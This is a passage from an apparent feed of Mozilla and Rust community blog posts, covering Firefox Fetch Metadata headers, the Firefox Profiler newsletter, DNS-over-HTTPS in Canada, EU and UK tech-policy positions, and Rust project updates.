Innocently, you continue to interact with your banking site which ultimately causes the banking web server to receive some actions. Unfortunately the banking web server has little to no control of who initiated the action, you or the attacker in the malicious website in the other tab. Hence the banking server or generally web application servers will most likely simply execute any action received and allow the attack to launch.

 

Introducing Fetch Metadata

As illustrated in the attack scenario above, the HTTP request header Sec-Fetch-Site allows the web application server to distinguish between a same-origin request from the corresponding web application and a cross-origin request from an attacker-controlled website.

Inspecting Sec-Fetch-* Headers ultimately allows the web application server to reject or also ignore malicious requests because of the additional context provided by the Sec-Fetch-* header family. In total there are four different Sec-Fetch-* headers: Dest, Mode, Site and User which together allow web applications to protect themselves and their end users against the previously mentioned cross-site attacks.

 

Going Forward

While Firefox will soon ship with it’s new Site Isolation Security Architecture which will combat a few of the above issues, we recommend that web applications make use of the newly supported Fetch Metadata headers which provide a defense in depth mechanism for applications of all sorts.

As a Firefox user, you can benefit from the additionally provided headers as soon as your Firefox auto-updates to version 90. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 90 supports Fetch Metadata Request Headers appeared first on Mozilla Security Blog.

Niko MatsakisCTCFT 2021-07-19 Agenda

The next “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place one week from today, on 2021-07-19 (in your time zone)! What follows are the abstracts for the talks we have planned. You’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Mentoring

Presented by: doc-jones

The Rust project has a number of mechanisms for getting people involved in the project, but most are oriented around 1:1 engagement. Doc has been investigating some of the ways that other projects engage contributors, such as Python’s mentored sprints. She will discuss how some of those projects run things and share some ideas about how that might be applied in the Rust project.

Lang team initiative process

Presented by: joshtriplett

The lang team recently established a new process we call initiatives. This is a refinement of the RFC process to include more explicit staging. Josh will talk about the new process, what motivated it, and how we’re trying to build more sustainable processes.

Driving discussions via postmortem analysis

Presented by: TBD

Innovation means taking risks, and risky behavior sometimes leads to process failures. An example of a recent process failure was the Rust 1.52.0 release, and subsequent 1.52.1 patch release that followed a few days later. Every failure presents an opportunity to learn from our mistakes and correct our processes going forward. In response to the 1.52.0 event, the compiler team recently went through a “course correction” postmortem process inspired by the “Correction of Error” reviews that pnkfelix has observed at Amazon. This talk describes the structure of a formal postmortem, and discusses how other Rust teams might deploy similar postmortem activities for themselves.

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.

Cameron KaiserTenFourFox FPR32 SPR2 available

TenFourFox Feature Parity Release 32 Security Parity Release 2 "32.2" is available for testing (downloads, hashes). There are no changes to the release notes and nothing particularly notable about the security patches in this release. Assuming no major problems, FPR32.2 will go live Monday evening Pacific time as usual.

The Mozilla BlogNet neutrality: reacting to the Executive Order on Promoting Competition in the American Economy

The Biden Administration issued today an Executive Order on Promoting Competition in the American Economy.

“Reinstating net neutrality is a crucial down payment on the much broader internet reform that we need and we’re glad to see the Biden Administration make this a priority in its new Executive Order today. Net neutrality preserves the environment that creates room for new businesses and new ideas to emerge and flourish, and where internet users can freely choose the companies, products, and services that they want to interact with and use. In a marketplace where consumers frequently do not have access to more than one internet service provider (ISP), these rules ensure that data is treated equally across the network by gatekeepers.” — Ashley Boyd, VP of Advocacy at Mozilla

In March 2021, we sent a joint letter to the FCC asking for the Commission to reinstate net neutrality as soon as it is in working order. Mozilla has been one of the leading voices in the fight for net neutrality for almost a decade, together with other advocacy groups. Mozilla has defended user access to the internet, in the US and around the world. Our work to preserve net neutrality has been a critical part of that effort, including our lawsuit against the FCC to keep these protections in place for users in the US.

The post Net neutrality: reacting to the Executive Order on Promoting Competition in the American Economy appeared first on The Mozilla Blog.

The Mozilla BlogMozilla responds to the UK CMA consultation on Google’s commitments on the Chrome Privacy Sandbox

Regulators and technology companies together have an unique opportunity to improve the privacy properties of online advertising. Improving privacy for everyone must remain the north star of efforts surrounding privacy preserving advertising and we welcome the recent moves by the UK’s Competition Markets Authority to invite public comments on the recent voluntary commitments proposed by Google for its Chrome Privacy Sandbox initiative. 

Google’s commitments are a positive step forward and a sign of tangible progress in creating a higher baseline for privacy protections on the open web. Yet, there remain ways in which the commitments can be made even stronger to promote competition and protect user privacy. In our submission, we focus on three specific points of feedback.

First, the CMA should work towards creating a high baseline of privacy protections and an even playing field for the open web. We strongly support binding commitments that would prohibit Google from self-preferencing when using the Chrome Privacy Sandbox technologies and from combining user data from certain sources for targeting or measuring digital ads on first and third party inventory. This approach provides a model for how regulators might protect both competition and privacy while allowing for innovation in the technology sector, and we hope to see this followed by other dominant technology platforms as well.

Second, Google should not be restricted from deploying limitations on the use of third-party cookies for pervasive web tracking, which should be made independent of the development of its Privacy Sandbox proposals. We encourage the CMA to reconsider requirements that will hinder efforts to build a more privacy respecting internet. Given the widespread harms resulting from web tracking, we believe restrictions on the use of third party cookies should be decoupled from the development of other Chrome Privacy Sandbox proposals and that Google should have the flexibility to protect its users from cross-site tracking on an unconditional timeframe. By doing so, agencies such as the CMA and ICO would publicly acknowledge the importance expeditiously limiting the role of third party cookies in pervasive web tracking. 

And third, relevant Chrome Privacy Sandbox proposals should be developed and deployed via formal processes at open standard bodies. It is critical for new functionality introduced by the Chrome Privacy Sandbox proposals to be thoroughly vetted to understand its implications for privacy and competition by all relevant stakeholders in a public and transparent manner. For this reason,we encourage the CMA to require an explicit commitment that relevant proposals are developed via formal processes and oversight at open standard development organizations (SDOs) and deployed pursuant to the final specifications.

We look forward to engaging with the CMA and other stakeholders in the coming months with our work on privacy preserving advertising, including but not limited to proposals within the Chrome Privacy Sandbox.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Privacy analysis of FLoC

The post Mozilla responds to the UK CMA consultation on Google’s commitments on the Chrome Privacy Sandbox appeared first on The Mozilla Blog.

Firefox Add-on ReviewsReddit revolutionized—use a browser extension to enhance your favorite forum

Reddit is awash with great conversation (well, not all the time). There’s a Reddit message board for just about everybody—sports fans, gamers, poets inspired by food, people who like arms on birds—you get the idea. 

If you spend time on Reddit, there are ways to greatly augment your experience with a browser extension… 

Reddit Enhancement Suite

Used by more the two million Redditors across various browsers, Reddit Enhancement Suite is optimized to work with the beloved “old Reddit” (the website underwent a major redesign in 2018; you can still access the prior design by visiting old.reddit.com). 

Key features: 

  • Subreddit manager. Customize the top nav bar with your own subreddit shortcuts. 
  • Account switcher. Easily manage multiple Reddit accounts with a couple quick clicks. 
  • Show “parent” comment on hover. When you mouse over a comment, its “parent” comment displays. 
  • Dashboard. Fully customizable dashboard showcases content from subreddits, your message inbox, and more. 
  • Tag specific users and subreddits so their activity appears more prominently
  • Custom filters. Select words, subreddits, or even certain users that you want filtered out of your Reddit experience. 
  • New comment count. See the number of new comments on a thread since your last visit. 
  • Never Ending Reddit. Just keep scrolling down the page; new content will continue loading (until you reach the end of the internet?). 

Old Reddit Redirect

Speaking of the former design, Old Reddit Redirect provides a straightforward function. It simply ensures that every Reddit page you visit will redirect to the old.reddit.com domain. 

Sure, if you have a Reddit account the site gives you the option of using the old design, but with the browser extension you’ll get the old site regardless of being logged in or not. It’s also great for when you click Reddit links shared from the new domain. 

Reddit on YouTube

Bring Reddit with you to YouTube. Whenever you’re on a YouTube page, Reddit on YouTube searches for Reddit posts that link to the video and embeds those comments into the YouTube comment area. 

You can easily toggle between Reddit and YouTube comments and select either one to be your default preference. 

<figcaption>If there are multiple Reddit threads about the video you’re watching, the extension will display them in tab form in the YouTube comment section. </figcaption>

Reddit Ad Remover

Sick of seeing so many “Promoted” posts and paid advertisements in the feed and sidebar? Reddit Ad Remover silences the noise. 

The extension even blocks auto-play video ads, which is great for people who don’t appreciate sudden bursts of commercial sound. Hey, somebody should create a subreddit about this

Happy redditing, folks. Feel free to explore more news and media extensions on addons.mozilla.org.

Mozilla Performance BlogPerformance Tools Newsletter (H1 2021)

As the Perf-Tools team, we are responsible for the Firefox Profiler. This tool is built directly into Firefox to understand the program runtime and analyze it to make it faster. If you are not familiar with it, I would recommend looking at our user documentation.

If you are curious about the profiler but not sure how to get to know it, I’ve also given a FOSDEM talk about using the Firefox Profiler for web performance analysis this year. If you are new to this tool, you can check it out there.

During our talks with the people who use the Firefox Profiler frequently, we realized that new features can be too subtle to notice or easily overlooked. So we’ve decided to prepare this newsletter to let you know about the new features and the improvements that we’ve made in the past 6 months. That way, you can continue to use it to its full potential!

Table of Contents

  1. New features
    1. Enabled the new profiler recording panel in Dev Edition
    2. Visualization of the CPU utilization
    3. Sample graph to show the samples’ position in the timeline
    4. Delete button on the profile viewer page
    5. Stacks now include the category color of each stack frame
    6. Profiler Rust API for thread registration has landed
    7. Firefox Profiler Analysis UI is now internationalized
    8. Screenshots are now visible while selecting a time range
    9. Android Trace format support
    10. “Profiler” category showing the profiler overhead
    11. “Show all tracks” button in the timeline tracks context menu
  2. Improvements
    1. Better network markers
    2. Better stack walking around JIT
    3. Better marker context menu
    4. Marker improvements
      1. New markers
      2. Fixes & Improvements
    5. Capturing a stack and adding category support for the JavaScript ChromeUtils.addProfilerMarker API
    6. Tooltips in the network track
    7. Made the Profile Info button more explicit
    8. Android device information inside the Profile Info panel
    9. Zip file viewer now automatically expands all the children
    10. New label frames for XPIDL method/getter/setter calls
    11. Profiler buffer memory is no longer counted in the profiler memory tracks
    12. Improved accessibility in the Network Chart
    13. Removed many MOZ_GECKO_PROFILER ifdefs
  3. What’s next?
  4. Conclusion

So, let’s get started with the new features.

New features

Enabled the new profiler recording panel in Dev Edition

In the DevTools panel, we still had the old performance tab. That tool was pretty old and not very well maintained for a while. The new Firefox Profiler is a lot more comprehensive compared to the old tool. We aim to make it the new default one. We’ve hit a big milestone and enabled it in the Firefox Dev Edition. We are hoping to get rid of the old panel soon. Thanks to Nicolas Chevobbe and Julian Descottes from the DevTools team for helping out on this!

Visualization of the CPU utilization

Previously, the height of the activity graph (the graph in the pictures) wasn’t directly tied to the actual amount of work done: We were setting the height to 100% when we saw a non-idle sample there, and then applying some smoothing. But now, we collect the CPU usage information from Firefox and then draw the height of this graph to match the CPU usage of this thread. This allows our users to see which part of the thread is using more CPU and which part of the thread is using less. This is important because our users were thinking that the height actually meant CPU usage already, but it wasn’t the case before. So, it’s good to match our users’ expectations in this case.

This new implementation also gives us information about the places where the Firefox is unresponsive but the thread is not using any CPU. In this case, it can mean that the thread is blocked.

When the graph height is not so high, except waiting for another thread, it can also mean that, either the thread is waiting on disk to write/read a lot, or the whole system is working on a heavy task and not giving Firefox enough CPU time to run.. Previously, it wasn’t possible to figure these cases out, but thanks to the CPU usage information, we can now understand it by looking at a profile.

Here are two example profiles. Both are from a startup of Firefox, but the first one is a warm startup, whereas the second one is a cold startup. You will notice easily that the graph height on the cold startup is a lot lower compared to the warm one. This is because on cold startups, we are reading a lot of data from the disk, and the reference laptop we used to capture these profiles has a slow disk:

You can see the new radio button with "Categories with CPU" in the top left corner of Firefox Profiler

Now we have “Categories with CPU” as a graph type. You can see that the graph is different now when CPU usage numbers differ.

Sample graph to show the samples’ position in the timeline

With the previous CPU utilization work, we also added another graph underneath the activity graph. As visible in the image below, you can now see the exact locations of the samples in this graph. You can also click on them to select that sample’s stack. With this graph, it’s also possible to see where we have missing samples. Missing samples usually mean that the profiler can’t keep up with the sampling. It’s good to note that we don’t know exactly what’s happening in these areas of the timeline. You can try to reduce the overhead of the profiler if you have so many missing samples, for example by increasing the sampling interval, because the profile data you captured will not be as reliable when the profiler can’t sample regularly enough.

Sample Graph can be found at the bottom of the activity graph in the timeline

Delete button on the profile viewer page

You can find it inside the “Profile Info” popup on the top right corner if you uploaded that profile. Previously we added this page to manage your uploaded profiles. But adding the delete button to the analysis UI was also important, so you can directly delete the profile that you easily uploaded. We keep a key in your browser’s local storage to know that you uploaded that profile data. So, to be able to delete it, you need to use the same browser that you uploaded it from.

Profile delete button can be found inside the "Profile Info" panel at the top right corner.

Stacks now include the category color of each stack frame

This is a small but a nice addition. We have stacks in tooltips, the marker table and the sidebar. Previously, it wasn’t possible to figure out which function belongs to which category. But with this change, you can now see their category colors on their left side. This gives you a quick overview of what’s happening in this stack.

Profiler Rust API for thread registration has landed

Gecko Profiler didn’t have a canonical Rust API. We had some hacks for multiple Rust projects, they were all similar but with subtle implementation differences. If you wanted to use profiler API functions in a new Rust project, you had to write everything again and again. We’ve decided to make a canonical Rust crate for the profiler, so people who work on Rust code can easily import and start using it immediately. We’ve landed the first part of this API now, which is about thread registration.

If you are working on a Rust project with multiple threads, don’t forget to register your threads with the Gecko Profiler. After registering them, you will be able to profile them by adding the thread names (or part thereof) to the custom thread names input in about:profiling. It’s pretty straightforward to register them with gecko_profiler::register_thread and gecko_profiler::unregister_thread.

More Rust API functions for the profiler are coming soon!

Firefox Profiler Analysis UI is now internationalized

Our Outreachy intern Hasna Hena Mow (CipherGirl) has worked on the internationalization of the profiler.firefox.com. And thanks to her, this project is complete now! The actual translation process is happening now.

A quick look on our localization work. The picture shows that now most of the strings are localized in the profiler analysis UI.

Screenshots are now visible while selecting a time range

That’s also one of the nice usability improvements. Previously, it wasn’t possible to see the screenshots while selecting a time range. That was a bit annoying, because screenshots are good indicators of what’s happening at that time, and they are usually good indicators when selecting a time range as well. So, now you can see them while selecting a range!

Android Trace format support

You can now import Android trace format to Firefox Profiler analysis UI easily. Just drag and drop the .trace file into firefox.profiler.com, it will import and open the profile data automatically without any additional steps. You can also open it using the button “Load a profile from file”.

“Profiler” category showing the profiler overhead

We’ve added a new category to show the profiler overhead. This is a pretty interesting indicator that we didn’t have before, because this is actually showing us how much the profiler itself is affecting the profile that we are capturing. So after capturing a profile, if you see a lot of red categories in the timeline, it usually means that the profiler is working too much and possibly skewing the data you are capturing. In this case, you can try to reduce the overhead of the profiler by going to the about:profiling page and increasing the interval or disabling some of the features.

"Profiler" category will be displayed as red colors in the graph. Also it's possible to see the category in the sidebar category breakdown.

“Show all tracks” button in the timeline tracks context menu

Another small feature to quickly make all the tracks visible! Quite handy when you have a lot of tracks and don’t know what you are looking for.

"Show All Tracks" button can be found inside the context menu that appears when you click on "X/Y tracks visible" button.

Improvements

Better network markers

Our network markers weren’t always reliable, especially when it comes to service workers. They were mostly marked as “unfinished markers” and not being displayed in the front-end due to lack of correct recording. We’ve made a lot of improvements to make them record properly and in the correct places. Some more fixes are coming in this area.

New network markers that belong to a service worker inside the "Network" tab.

New network markers that belong to a service worker inside the “Network” tab.

Better stack walking around JIT

This was another big task we wanted to fix for a while. Sometimes, when a stack included JIT (Just In Time-compiled JavaScript) frames, it would fail to find their native calling functions, causing a large number of samples to appear in separate locations from where they should have been. The Profiler can now use JIT information to correctly restart stack walking when needed. It’s a platform-dependent task, and only 64-bit Windows is fixed for now. macOS fixes are in review and will land soon, with other platforms to follow in the coming months.

Better marker context menu

We display context menus in various places. And inside the Marker Chart and Marker Table panels, we are displaying the marker context menu. Previously, it wasn’t really easy to understand and find the item that you want to click, even for people who are used to the profiler. Now, it’s a lot easier to understand and find the item you want to click with better wording, icons, and bold texts where necessary.

Right clicking on a marker will open a context menu that you can do various marker operations.

Marker improvements

New markers:
  •  SetNeedStyleFlush
    • This marker is very useful when the user is curious when and where a potential style invalidation happened.
  • Runnable
    • This marker is showing when a runnable is executed. This is especially useful to identify tasks that repeatedly take very little CPU time. These were impossible to find with only periodic stack sampling.
  • Sync IPC
    • Sync IPC is a common cause of slowness or blocked threads. You can easily see them with these markers now.
  • CSS animation
    • It’s useful when you want to see which animation is running at a point in time. It also includes the animation name.
  • CSS transition
    • It’s useful when you want to see if a transition is running. It also includes the transitioned property name.
  • Perform microtasks
    • It’s useful to know when microtasks are executed.
  • Worker.postMessage
    • It’s useful to know for sure which worker is involved. It either includes the worker name or the script url.
  • RefreshObserver
    • It’s useful when you need to figure out why a refresh driver keeps firing, and it is doing so because it still has observers.
  • Image Load and Image Paint
    • They are useful when you need to see when an image loads and paints.
  • Test markers (in TestUtils.jsm and BrowserTestUtils.jsm)
    • It’s useful when you are profiling a test. You can see more information about the state of the test and have an idea of what’s happening in the timeline.
    • They are also being displayed first in the Marker Chart, as they are very relevant when they exist.
  • Process Priority
    • These markers track process priority change when they are done in the parent process, and also when child processes receive the corresponding notification. It’s useful to see if some low responsiveness may be due to priorities.
Fixes & Improvements:
  • We added more Inner Window IDs to the markers. The tooltips in the analysis UI show which markers belong to which URLs with this information.
  • Now you can see the proportion of nursery-allocated strings that were deduplicated on the GC Minor markers thanks to :sfink.
    GC Minor marker tooltip includes the proportion of nursery-allocated strings that were deduplicated.
  • Fixed a bug where the dot markers appeared in the wrong places. This was an annoying bug that made the dot markers appear in the wrong place. And it was changing the location depending on the zoom level. Now, our small markers are more reliable.
    Now you can click on the correct marker even though it's very small.
  • Marker tooltips now display the inner window ids if there are multiple pages with the same URL. This is helpful when you have multiple pages open with the same URL. It can be either a webpage URL or internal chrome URLs. In this example, there were multiple browser.xhtml documents due to multiple windows. You can now figure out if they are the same browser.xhtml documents or not.You can see the id at the right side of the URL now.

Capturing a stack and adding category support for the JavaScript ChromeUtils.addProfilerMarker API

You may know the ChromeUtils.addProfilerMarker API for capturing a profiler marker from JavaScript. With this change, this API now supports capturing a stack and adding a category to them. Capturing a stack is important when you need to know the cause of an event. This will show up on the marker tooltips in the analysis UI. Similarly, categories will show up on the marker’s tooltip in the Marker Chart, and in the sidebar in the Marker Table.

Tooltips in the network track

We had the network track for the visualization of the network markers. Previously it was only showing you where a network request starts and ends, but to be able to see more, you had to switch to the “Network” tab. Now you can directly hover over any network request in this track and it will show you the information about it in a tooltip. More improvements are coming in this area!

Made the Profile Info button more explicit

We have a profile info button on the top right corner of the analysis page. When you click on this button, we open the Profile Info panel where we display the metadata that were gathered from Firefox. This metadata includes profile related information like recording time and settings, application information like Firefox version and build ID and platform information like OS, ABI and CPU. We got some feedback about this button not being very visible and explicit. Now, it is.

Before:
Previosly it was displayed as "Uploaded Profile".After:
Now it's displayed as "Profile Info".

Android device information inside the Profile Info panel

This is a small usability improvement for Android folks. It’s in the panel we discussed in the previous improvement. Previously, it was possible to see the Android version, ABI and CPU information in the Platform section. But it wasn’t possible to see the device name which is pretty important most of the time. Now, you can see that in the Profile Info panel on the top right corner.

After opening the Profile Info panel on the top right corner, you will find the "Device" field under the Platform section

You can see that information under the “platform” section inside Profile Info panel.

Zip file viewer now automatically expands all the children

This is another usability improvement. When you open profile data from a zip file (like the ones from treeherder) it’s not always easy to find the profile data you want. Especially because treeherder puts the profile files in a folder that’s buried under some other folders. Now it will be just a click away, because zip file viewer now expands all the children.

All the children will be expanded automatically when you open a zip file.

New label frames for XPIDL method/getter/setter calls

When JavaScript code calls an XPIDL method/getter/setter, we weren’t doing a good job showing this. Now, with the new label frames you can see them easily, and with a category change as well. It’s similar to what we already had for WebIDL.

Profiler buffer memory is no longer counted in the profiler memory tracks

A recent Profiler buffer change was affecting the memory track and was making it hard to see small memory changes unrelated to the Profiler (which typically uses 1MB chunks). With this change, it’s now possible to see these small changes.

Improved accessibility in the Network Chart

The Network Chart panel is more usable with only a keyboard now!

Removed many MOZ_GECKO_PROFILER ifdefs

Less places to potentially break on Tier-3 platform builds! We are still incrementally working on reducing the MOZ_GECKO_PROFILER ifdefs to make our and our users’ life easier.

What’s next?

We’ve talked about the things we did so far. There are also so many things we still would like to do. I want to mention some of them here as well, in case you are curious. It’s not going to be a complete list, but at least it can give you some ideas about the direction we are heading as the Performance Tools team.

There is some unfinished work we would like to finish. Like shipping the Firefox Profiler in DevTools panel (also known as the unified profiler project), finishing the JIT stack walking fixes, landing more Rust Profiler APIs. But we also want to work on some new things like: Reducing the overhead of the profiler, making it easier to find unregistered threads and better support for profiling with many threads, making the IPC markers better, collecting CPU usage of all threads and/or processes, making a lot more usability improvements and polishes.

If you also have something on your mind about the things we can improve, please let us know!

Conclusion

Thanks for reading this far! It’s been a busy first half in 2021 and we intend to continue making the Firefox Profiler better with the things I discussed in the previous section. If you have any questions or feedback, please feel free to reach out to me on Matrix (@canova:mozilla.org). You can also reach out to our team on Firefox Profiler channel on Matrix (#profiler:mozilla.org).

If you profiled something and are puzzled with the profile you captured, we also have the Joy of Profiling (#joy-of-profiling:mozilla.org) channel where people share their profiles and get help from the people who are more familiar with the Firefox Profiler. In addition to that, we have the Joy of Profiling Open Sessions where some Firefox Profiler and Performance engineers gather together on Zoom to answer questions or analyze the profiles you captured. It’s usually happening every Monday, and you can follow the “Performance Office Hours” calendar to learn more about it.

Mozilla Privacy BlogMozilla publishes policy recommendations for EU Digital Markets Act

As the Digital Markets Act (DMA) progresses through the legislative mark-up phase, we’re today publishing our policy recommendations on how lawmakers in the European Parliament and EU Council should amend it.

We welcomed the publication of the DMA in December 2020, and we believe that a vibrant and open internet depends on fair conditions, open standards, and opportunities for a diversity of market participants. With targeted improvements and effective enforcement, we believe the DMA could help restore the internet to be the universal platform where any company can advertise itself and offer its services, any developer can write code and collaborate with others to create new technologies on a fair playing field, and any consumer can navigate information, use critical online services, connect with others, find entertainment, and improve their livelihood

Our key recommendations can be summarised as follows:

  • Consumer Control: The DMA should ban dark patterns and other forms of manipulative design techniques. Data portability should also be included in the proposal to reduce switching costs for consumers.
    txt
  • Interoperability: We propose to expand the interoperability mandate to allow regulators to restrain gatekeepers from behaviour that explicitly goes against the spirit of interoperability. It should also be extended to cover not only ancillary services but the relationship between core services.
    txt
  • Innovation not discrimination: We propose to broaden the prohibition on self-preferencing in ranking systems to a general prohibition so as to address any problematic affiliated preferencing by gatekeepers of their own products in operating systems.
    txt
  • Meaningful Privacy: We underline our support for the provision which prohibits data sharing between gatekeeper verticals, and encourage the effective enforcement of the GDPR.
    txt
  • Effective Oversight & Enforcement: We recommend the oversight framework involve  National Regulatory Authorities to reduce bottlenecks in investigations and enforcement.

We spell out these recommendations in detail in our position paper, and provide practical guidance for lawmakers on how to amend the DMA draft law to incorporate them. As the DMA discussions continue in earnest, we look forward to working with EU lawmakers and the broader community of policy stakeholders to help ensure a final legislative text that promotes a healthy internet that puts competition and consumer choice first.

The post Mozilla publishes policy recommendations for EU Digital Markets Act appeared first on Open Policy & Advocacy.

The Mozilla BlogFirefox extends privacy and security of Canadian internet users with by-default DNS-over-HTTPS rollout in Canada

CIRA Joins Firefox’s Trusted Recursive Resolver Program

In a few weeks, Firefox will start the by-default rollout of DNS over HTTPS (or DoH for short) to its Canadian users in partnership with local DoH provider CIRA, the Canadian Internet Registration Authority. DoH will first become a default for 1% of Canadian Firefox users and will gradually reach 100% of Canadian Firefox users – thereby further increasing their security and privacy online. This follows the by-default rollout of DoH to US users in February 2020. 

As part of the rollout, CIRA joins Mozilla’s Trusted Recursive Resolver (TRR) Program and becomes the first internet registration authority and the first Canadian organization to provide Canadian Firefox users with private and secure encrypted Domain Name System (DNS) services.

“Unencrypted DNS is a major privacy issue and part of the legacy of the old, insecure, Internet. We’re very excited to be able to partner with CIRA to help fix that for our Canadian users and protect more of their browsing history by default.”

Eric Rescorla, Firefox CTO.

“Protecting the privacy of Canadians is a key element of restoring trust on the internet. Our goal is to cover as many Canadians as possible with Canadian Shield, and that means finding like-minded partners who share our values. We are proud to be the first Canadian participant in the Trusted Recursive Resolver (TRR) Program and are always seeking out new ways to extend the reach of Canadian Shield to enhance the privacy of Canadians.”  

Byron Holland, president and CEO, CIRA.

Once enrolled, Firefox users located in Canada will see a terminology panel pop up (see screenshot below) that will ask them to approve or opt out of DoH protection. When going to Settings in the settings menu in Firefox, then scrolling down to the Network Settings section and clicking on the Network Settings button, a dialogue box will open. Canadian Firefox users will be able to confirm that “CIRA Canadian Shield” is enabled by looking at the bottom of the dialogue box. They will also have the option to choose Cloudflare or NextDNS as an alternative Trusted Recursive Resolver.

<figcaption>Firefox users in Canada will see a panel letting them know that their DNS requests are encrypted and routed through a DNS over HTTPS provider who has joined Mozilla’s Trusted Recursive Resolver Program</figcaption>

For more than 35 years, DNS has served as a key mechanism for accessing sites and services on the internet. Functioning as the internet’s address book, DNS translates website names, like Firefox.com and cira.ca, into the internet addresses that a computer understands so that the browser can load the correct website.

Since 2018, Mozilla, CIRA, and other industry stakeholders have been working to develop, standardize, and deploy a technology called DNS over HTTPS (or DoH). DoH helps to protect browsing activity from interception, manipulation, and collection in the middle of the network by encrypting the DNS data.

Encrypting DNS data with DoH is the first step. A necessary second step is to require that the companies handling this data have appropriate rules in place – like the ones outlined in Mozilla’s TRR Program. This program aims to standardize requirements in three areas: limiting data collection and retention from the resolver, ensuring transparency for any data retention that does occur, and limiting any potential use of the resolver to block access or modify content. By combining the technology, DoH, with strict operational requirements for those implementing it, participants take an important step toward improving user privacy.

CIRA is the latest resolver, and the first internet registration authority, to join Firefox’s TRR Program, joining Cloudflare, NextDNS and Comcast. Mozilla began the rollout of encrypted DNS over HTTPS (DoH) by default for US-based Firefox users in February 2020, but began testing the protocol in 2018 and DoH has been available worldwide for Firefox users who choose to turn it on.

DoH is just one of the many privacy protections we provide to our users, like Enhanced Tracking Protection by default in Firefox and the Mozilla VPN.

The post Firefox extends privacy and security of Canadian internet users with by-default DNS-over-HTTPS rollout in Canada appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 398

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is css-inline, a crate to inline CSS into style tags.

Thanks to Dmitry Dygalo for the suggestion.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

Synth

Sycamore

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

297 pull requests were merged in the last week

Rust Compiler Performance Triage

A fairly mixed week with improvements and regressions mostly balancing themselves out. The highlight of this week is we have now started to adopt a new performance triage process which will label PRs that introduce performance regressions with the perf-regression label. Authors and/or reviewers are expected to justify their performance regression either by a short summary of why the change is worth it despite the regression or by creating an issue to follow-up on the regression.

We hope this process will lead to better compiler performance in the long term.

Triage done by @rylev. Revision range: 5a78340..9a27044

2 Regressions, 3 Improvements, 2 Mixed 1 of them in rollups

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

StructionSite

ChainSafe Systems

InfinyOn

Merantix

NORICS GmbH

NZXT

Parity Technologies

Esturary

Kraken

Subspace Network

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

One thing I like about Rust is that it filters out lazy/sloppy thinkers. Even when I disagree with another Rust programmer, there is a certain level of respect that comes from knowing that they thought about the problem deeply enough to pass the borrow checker.

Zeroexcuses on rust-users

Thanks to Jonah for the self-suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Chris H-CResponsible Data Collection is Good, Actually (Ubisoft Data Summit 2021)

In June I was invited to talk at Ubisoft’s Data Summit about how Mozilla does data. I’ve given a short talk on this subject before, but this was an opportunity to update the material, cover more ground, and include more stories. The talk, including questions, comes in at just under an hour and is probably best summarized by the synopsis:

Learn how responsible data collection as practiced at Mozilla makes cataloguing easy, stops instrumentation mistakes before they ship, and allows you to build self-serve analysis tooling that gets everyone invested in data quality. Oh, and it’s cheaper, too.

If you want to skip to the best bits, I included shameless advertising for Mozilla VPN at 3:20 and becoming a Mozilla contributor at 14:04, and I lose my place in my notes at about 29:30.

Many thanks to Mathieu Nayrolles, Sebastien Hinse and the Data Summit committee at Ubisoft for guiding me through the process and organizing a wonderful event.

:chutten

Data@MozillaResponsible Data Collection is Good, Actually (Ubisoft Data Summit 2021)

In June I was invited to talk at Ubisoft’s Data Summit about how Mozilla does data. I’ve given a short talk on this subject before, but this was an opportunity to update the material, cover more ground, and include more stories. The talk, including questions, comes in at just under an hour and is probably best summarized by the synopsis:

Learn how responsible data collection as practiced at Mozilla makes cataloguing easy, stops instrumentation mistakes before they ship, and allows you to build self-serve analysis tooling that gets everyone invested in data quality. Oh, and it’s cheaper, too.

If you want to skip to the best bits, I included shameless advertising for Mozilla VPN at 3:20 and becoming a Mozilla contributor at 14:04, and I lose my place in my notes at about 29:30.

Many thanks to Mathieu Nayrolles, Sebastien Hinse and the Data Summit committee at Ubisoft for guiding me through the process and organizing a wonderful event.

:chutten

Mozilla Localization (L10N)Better Understanding Pontoon Notifications to Improve Them

As l10n-drivers, we strongly believe that notifications are an important tool to help localizers organize, improve, and prioritize their work in Pontoon. In order to make them more effective, and focus our development work, we first needed to better understand how localizers use them (or don’t).

In the second quarter of 2021, we ran a couple of experiments and a survey to get a clearer picture of the current status, and this blog post describes in detail the results of this work.

Experiments

First of all, we needed a baseline to understand if the experiments were making significant changes. Unfortunately, this data is quite hard to measure, since there are a lot of factors at play:

  • Localizers are more active close to deadlines or large releases, and those happen randomly.
  • The number of notifications sent heavily depends on new content showing up in the active projects (31), and that has unpredictable spikes over time.

With that in mind, we decided to repeat the same process every month:

  • Look at the notifications sent in the first 2 weeks of the month (“observation period”, starting with a Monday, and ending with a Monday two weeks later).
